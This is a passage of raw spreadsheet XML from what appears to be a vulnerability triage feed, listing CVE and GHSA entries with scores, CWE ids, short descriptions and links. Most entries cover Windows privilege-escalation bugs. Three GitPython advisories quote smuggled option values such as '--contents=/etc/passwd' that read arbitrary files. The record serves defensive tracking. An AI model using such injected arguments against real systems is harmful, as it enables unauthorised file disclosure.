t="inlineStr"><is><t>NVD</t></is></c><c r="O1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1333" s="5" t="inlineStr" /><c r="Q1333" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1333" s="5" t="inlineStr"><is><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is></c><c r="S1333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t></is></c></row><row r="1334"><c r="A1334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1334" s="5" t="inlineStr"><is><t>CVE-2026-86718</t></is></c><c r="D1334" s="5" t="n"><v>7.1</v></c><c r="E1334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1334" s="5" t="inlineStr" /><c r="H1334" s="5" t="n"><v>0.002</v></c><c r="I1334" s="5" t="inlineStr" /><c r="J1334" s="5" t="inlineStr" /><c r="K1334" s="5" t="inlineStr" /><c r="L1334" s="5" t="inlineStr" /><c r="M1334" s="5" t="inlineStr" /><c r="N1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1334" s="5" t="inlineStr" /><c r="Q1334" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1334" s="5" t="inlineStr"><is><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is></c><c r="S1334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t></is></c></row><row r="1335"><c r="A1335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1335" s="5" t="inlineStr"><is><t>CVE-2026-86724</t></is></c><c r="D1335" s="5" t="n"><v>7.1</v></c><c r="E1335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1335" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1335" s="5" t="inlineStr" /><c r="H1335" s="5" t="n"><v>0.001</v></c><c r="I1335" s="5" t="inlineStr" /><c r="J1335" s="5" t="inlineStr" /><c r="K1335" s="5" t="inlineStr" /><c r="L1335" s="5" t="inlineStr" /><c r="M1335" s="5" t="inlineStr" /><c r="N1335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1335" s="5" t="inlineStr" /><c r="Q1335" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1335" s="5" t="inlineStr"><is><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is></c><c r="S1335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t></is></c></row><row r="1336"><c r="A1336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1336" s="5" t="inlineStr"><is><t>CVE-2026-86725</t></is></c><c r="D1336" s="5" t="n"><v>7.1</v></c><c r="E1336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1336" s="5" t="inlineStr" /><c r="H1336" s="5" t="n"><v>0.003</v></c><c r="I1336" s="5" t="inlineStr" /><c r="J1336" s="5" t="inlineStr" /><c r="K1336" s="5" t="inlineStr" /><c r="L1336" s="5" t="inlineStr" /><c r="M1336" s="5" t="inlineStr" /><c r="N1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1336" s="5" t="inlineStr" /><c r="Q1336" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1336" s="5" t="inlineStr"><is><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is></c><c r="S1336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t></is></c></row><row r="1337"><c r="A1337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1337" s="5" t="inlineStr"><is><t>CVE-2026-86734</t></is></c><c r="D1337" s="5" t="n"><v>7.1</v></c><c r="E1337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1337" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1337" s="5" t="inlineStr" /><c r="H1337" s="5" t="n"><v>0.003</v></c><c r="I1337" s="5" t="inlineStr" /><c r="J1337" s="5" t="inlineStr" /><c r="K1337" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1337" s="5" t="inlineStr" /><c r="M1337" s="5" t="inlineStr" /><c r="N1337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1337" s="5" t="inlineStr" /><c r="Q1337" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1337" s="5" t="inlineStr"><is><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is></c><c r="S1337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t></is></c></row><row r="1338"><c r="A1338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1338" s="5" t="inlineStr"><is><t>CVE-2026-9331</t></is></c><c r="D1338" s="5" t="n"><v>7.1</v></c><c r="E1338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1338" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1338" s="5" t="inlineStr" /><c r="H1338" s="5" t="n"><v>0.002</v></c><c r="I1338" s="5" t="inlineStr" /><c r="J1338" s="5" t="inlineStr" /><c r="K1338" s="5" t="inlineStr" /><c r="L1338" s="5" t="inlineStr" /><c r="M1338" s="5" t="inlineStr" /><c r="N1338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1338" s="5" t="inlineStr" /><c r="Q1338" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1338" s="5" t="inlineStr"><is><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is></c><c r="S1338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t></is></c></row><row r="1339"><c r="A1339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1339" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1339" s="5" t="inlineStr"><is><t>GHSA-6rj2-96f5-chj9</t></is></c><c r="D1339" s="5" t="n"><v>7.1</v></c><c r="E1339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1339" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1339" s="5" t="inlineStr" /><c r="H1339" s="5" t="inlineStr" /><c r="I1339" s="5" t="inlineStr" /><c r="J1339" s="5" t="inlineStr" /><c r="K1339" s="5" t="inlineStr" /><c r="L1339" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M1339" s="5" t="inlineStr" /><c r="N1339" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1339" s="5" t="inlineStr" /><c r="P1339" s="5" t="inlineStr" /><c r="Q1339" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1339" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-3wxw-xv34-2frg. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 contains an arbitrary file read vulnerability in TagReference.create() where a positional reference parameter bypasses the unsafe option guard. Attackers can supply a reference value like --file=&lt;path&gt; to read arbitrary files, with contents returned in the annotated tag message.</t></is></c><c r="S1339" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-6rj2-96f5-chj9</t></is></c></row><row r="1340"><c r="A1340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1340" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1340" s="5" t="inlineStr"><is><t>GHSA-89ff-m8wv-p99r</t></is></c><c r="D1340" s="5" t="n"><v>7.1</v></c><c r="E1340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1340" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1340" s="5" t="inlineStr" /><c r="H1340" s="5" t="inlineStr" /><c r="I1340" s="5" t="inlineStr" /><c r="J1340" s="5" t="inlineStr" /><c r="K1340" s="5" t="inlineStr" /><c r="L1340" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M1340" s="5" t="inlineStr" /><c r="N1340" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1340" s="5" t="inlineStr" /><c r="P1340" s="5" t="inlineStr" /><c r="Q1340" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R1340" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-5xxx-qhh7-9287. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.</t></is></c><c r="S1340" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-89ff-m8wv-p99r</t></is></c></row><row r="1341"><c r="A1341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1341" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1341" s="5" t="inlineStr"><is><t>GHSA-w672-239g-c3gr</t></is></c><c r="D1341" s="5" t="n"><v>7.1</v></c><c r="E1341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1341" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1341" s="5" t="inlineStr" /><c r="H1341" s="5" t="inlineStr" /><c r="I1341" s="5" t="inlineStr" /><c r="J1341" s="5" t="inlineStr" /><c r="K1341" s="5" t="inlineStr" /><c r="L1341" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M1341" s="5" t="inlineStr" /><c r="N1341" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1341" s="5" t="inlineStr" /><c r="P1341" s="5" t="inlineStr" /><c r="Q1341" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1341" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hh9p-6wh2-4mfc. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.58 fail to validate options passed to git rm and git checkout commands in IndexFile.remove() and Head.checkout(). Attackers can supply --pathspec-from-file and --pathspec-file-nul parameters to read arbitrary files accessible to the process, with full file contents returned in GitCommandError.stderr.</t></is></c><c r="S1341" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-w672-239g-c3gr</t></is></c></row><row r="1342"><c r="A1342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1342" s="5" t="inlineStr"><is><t>CVE-2026-50349</t></is></c><c r="D1342" s="5" t="n"><v>7</v></c><c r="E1342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1342" s="5" t="inlineStr" /><c r="H1342" s="5" t="n"><v>0.002</v></c><c r="I1342" s="5" t="inlineStr" /><c r="J1342" s="5" t="inlineStr" /><c r="K1342" s="5" t="inlineStr" /><c r="L1342" s="5" t="inlineStr" /><c r="M1342" s="5" t="inlineStr" /><c r="N1342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1342" s="5" t="inlineStr" /><c r="Q1342" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1342" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t></is></c></row><row r="1343"><c r="A1343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1343" s="5" t="inlineStr"><is><t>CVE-2026-58848</t></is></c><c r="D1343" s="5" t="n"><v>7</v></c><c r="E1343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1343" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1343" s="5" t="inlineStr" /><c r="H1343" s="5" t="n"><v>0.001</v></c><c r="I1343" s="5" t="inlineStr" /><c r="J1343" s="5" t="inlineStr" /><c r="K1343" s="5" t="inlineStr" /><c r="L1343" s="5" t="inlineStr" /><c r="M1343" s="5" t="inlineStr" /><c r="N1343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1343" s="5" t="inlineStr" /><c r="Q1343" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1343" s="5" t="inlineStr"><is><t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S1343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t></is></c></row><row r="1344"><c r="A1344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1344" s="5" t="inlineStr"><is><t>CVE-2026-62653</t></is></c><c r="D1344" s="5" t="n"><v>7</v></c><c r="E1344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1344" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1344" s="5" t="inlineStr" /><c r="H1344" s="5" t="n"><v>0.002</v></c><c r="I1344" s="5" t="inlineStr" /><c r="J1344" s="5" t="inlineStr" /><c r="K1344" s="5" t="inlineStr" /><c r="L1344" s="5" t="inlineStr" /><c r="M1344" s="5" t="inlineStr" /><c r="N1344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1344" s="5" t="inlineStr" /><c r="Q1344" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1344" s="5" t="inlineStr"><is><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is></c><c r="S1344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t></is></c></row><row r="1345"><c r="A1345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1345" s="5" t="inlineStr"><is><t>CVE-2026-62654</t></is></c><c r="D1345" s="5" t="n"><v>7</v></c><c r="E1345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1345" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1345" s="5" t="inlineStr" /><c r="H1345" s="5" t="n"><v>0.001</v></c><c r="I1345" s="5" t="inlineStr" /><c r="J1345" s="5" t="inlineStr" /><c r="K1345" s="5" t="inlineStr" /><c r="L1345" s="5" t="inlineStr" /><c r="M1345" s="5" t="inlineStr" /><c r="N1345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1345" s="5" t="inlineStr" /><c r="Q1345" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="R1345" s="5" t="inlineStr"><is><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is></c><c r="S1345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t></is></c></row><row r="1346"><c r="A1346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1346" s="5" t="inlineStr"><is><t>CVE-2026-62694</t></is></c><c r="D1346" s="5" t="n"><v>7</v></c><c r="E1346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1346" s="5" t="inlineStr" /><c r="H1346" s="5" t="n"><v>0.003</v></c><c r="I1346" s="5" t="inlineStr" /><c r="J1346" s="5" t="inlineStr" /><c r="K1346" s="5" t="inlineStr" /><c r="L1346" s="5" t="inlineStr" /><c r="M1346" s="5" t="inlineStr" /><c r="N1346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1346" s="5" t="inlineStr" /><c r="Q1346" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1346" s="5" t="inlineStr"><is><t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t></is></c></row><row r="1347"><c r="A1347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1347" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1347" s="5" t="inlineStr"><is><t>CVE-2026-62727</t></is></c><c r="D1347" s="5" t="n"><v>7</v></c><c r="E1347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1347" s="5" t="inlineStr" /><c r="H1347" s="5" t="n"><v>0.002</v></c><c r="I1347" s="5" t="inlineStr" /><c r="J1347" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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47" s="5" t="inlineStr" /><c r="M1347" s="5" t="inlineStr" /><c r="N1347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1347" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1347" s="5" t="inlineStr" /><c r="Q1347" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1347" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t></is></c></row><row r="1348"><c r="A1348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1348" s="5" t="inlineStr"><is><t>CVE-2026-68824</t></is></c><c r="D1348" s="5" t="n"><v>7</v></c><c r="E1348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1348" s="5" t="inlineStr" /><c r="H1348" s="5" t="n"><v>0.002</v></c><c r="I1348" s="5" t="inlineStr" /><c r="J1348" s="5" t="inlineStr" /><c r="K1348" s="5" t="inlineStr" /><c r="L1348" s="5" t="inlineStr" /><c r="M1348" s="5" t="inlineStr" /><c r="N1348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1348" s="5" t="inlineStr" /><c r="Q1348" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1348" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t></is></c></row><row r="1349"><c r="A1349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1349" s="5" t="inlineStr"><is><t>CVE-2026-68825</t></is></c><c r="D1349" s="5" t="n"><v>7</v></c><c r="E1349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1349" s="5" t="inlineStr" /><c r="H1349" s="5" t="n"><v>0.003</v></c><c r="I1349" s="5" t="inlineStr" /><c r="J1349" s="5" t="inlineStr" /><c r="K1349" s="5" t="inlineStr" /><c r="L1349" s="5" t="inlineStr" /><c r="M1349" s="5" t="inlineStr" /><c r="N1349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1349" s="5" t="inlineStr" /><c r="Q1349" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1349" s="5" t="inlineStr"><is><t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t></is></c></row><row r="1350"><c r="A1350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1350" s="5" t="inlineStr"><is><t>CVE-2026-68837</t></is></c><c r="D1350" s="5" t="n"><v>7</v></c><c r="E1350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1350" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1350" s="5" t="inlineStr" /><c r="H1350" s="5" t="n"><v>0.002</v></c><c r="I1350" s="5" t="inlineStr" /><c r="J1350" s="5" t="inlineStr" /><c r="K1350" s="5" t="inlineStr" /><c r="L1350" s="5" t="inlineStr" /><c r="M1350" s="5" t="inlineStr" /><c r="N1350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1350" s="5" t="inlineStr" /><c r="Q1350" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1350" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t></is></c></row><row r="1351"><c r="A1351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1351" s="5" t="inlineStr"><is><t>CVE-2026-68840</t></is></c><c r="D1351" s="5" t="n"><v>7</v></c><c r="E1351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1351" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1351" s="5" t="inlineStr" /><c r="H1351" s="5" t="n"><v>0.002</v></c><c r="I1351" s="5" t="inlineStr" /><c r="J1351" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K135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51" s="5" t="inlineStr" /><c r="M1351" s="5" t="inlineStr" /><c r="N1351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1351" s="5" t="inlineStr" /><c r="Q1351" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1351" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t></is></c></row><row r="1352"><c r="A1352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1352" s="5" t="inlineStr"><is><t>CVE-2026-68847</t></is></c><c r="D1352" s="5" t="n"><v>7</v></c><c r="E1352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1352" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1352" s="5" t="inlineStr" /><c r="H1352" s="5" t="n"><v>0.002</v></c><c r="I1352" s="5" t="inlineStr" /><c r="J1352" s="5" t="inlineStr" /><c r="K1352" s="5" t="inlineStr" /><c r="L1352" s="5" t="inlineStr" /><c r="M1352" s="5" t="inlineStr" /><c r="N1352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1352" s="5" t="inlineStr" /><c r="Q1352" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1352" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t></is></c></row><row r="1353"><c r="A1353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1353" s="5" t="inlineStr"><is><t>CVE-2026-68884</t></is></c><c r="D1353" s="5" t="n"><v>7</v></c><c r="E1353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1353" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1353" s="5" t="inlineStr" /><c r="H1353" s="5" t="n"><v>0.003</v></c><c r="I1353" s="5" t="inlineStr" /><c r="J1353" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1353"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353" s="5" t="inlineStr" /><c r="M1353" s="5" t="inlineStr" /><c r="N1353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1353" s="5" t="inlineStr" /><c r="Q1353" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1353" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t></is></c></row><row r="1354"><c r="A1354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1354" s="5" t="inlineStr"><is><t>CVE-2026-68897</t></is></c><c r="D1354" s="5" t="n"><v>7</v></c><c r="E1354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1354" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1354" s="5" t="inlineStr" /><c r="H1354" s="5" t="n"><v>0.002</v></c><c r="I1354" s="5" t="inlineStr" /><c r="J1354" s="5" t="inlineStr" /><c r="K1354" s="5" t="inlineStr" /><c r="L1354" s="5" t="inlineStr" /><c r="M1354" s="5" t="inlineStr" /><c r="N1354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1354" s="5" t="inlineStr" /><c r="Q1354" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1354" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t></is></c></row><row r="1355"><c r="A1355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1355" s="5" t="inlineStr"><is><t>CVE-2026-69275</t></is></c><c r="D1355" s="5" t="n"><v>7</v></c><c r="E1355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1355" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1355" s="5" t="inlineStr" /><c r="H1355" s="5" t="n"><v>0.002</v></c><c r="I1355" s="5" t="inlineStr" /><c r="J1355" s="5" t="inlineStr" /><c r="K1355" s="5" t="inlineStr" /><c r="L1355" s="5" t="inlineStr" /><c r="M1355" s="5" t="inlineStr" /><c r="N1355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1355" s="5" t="inlineStr" /><c r="Q1355" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1355" s="5" t="inlineStr"><is><t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t></is></c></row><row r="1356"><c r="A1356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1356" s="5" t="inlineStr"><is><t>CVE-2026-69279</t></is></c><c r="D1356" s="5" t="n"><v>7</v></c><c r="E1356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1356" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1356" s="5" t="inlineStr" /><c r="H1356" s="5" t="n"><v>0.003</v></c><c r="I1356" s="5" t="inlineStr" /><c r="J1356" s="5" t="inlineStr" /><c r="K1356" s="5" t="inlineStr" /><c r="L1356" s="5" t="inlineStr" /><c r="M1356" s="5" t="inlineStr" /><c r="N1356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1356" s="5" t="inlineStr" /><c r="Q1356" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1356" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t></is></c></row><row r="1357"><c r="A1357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c 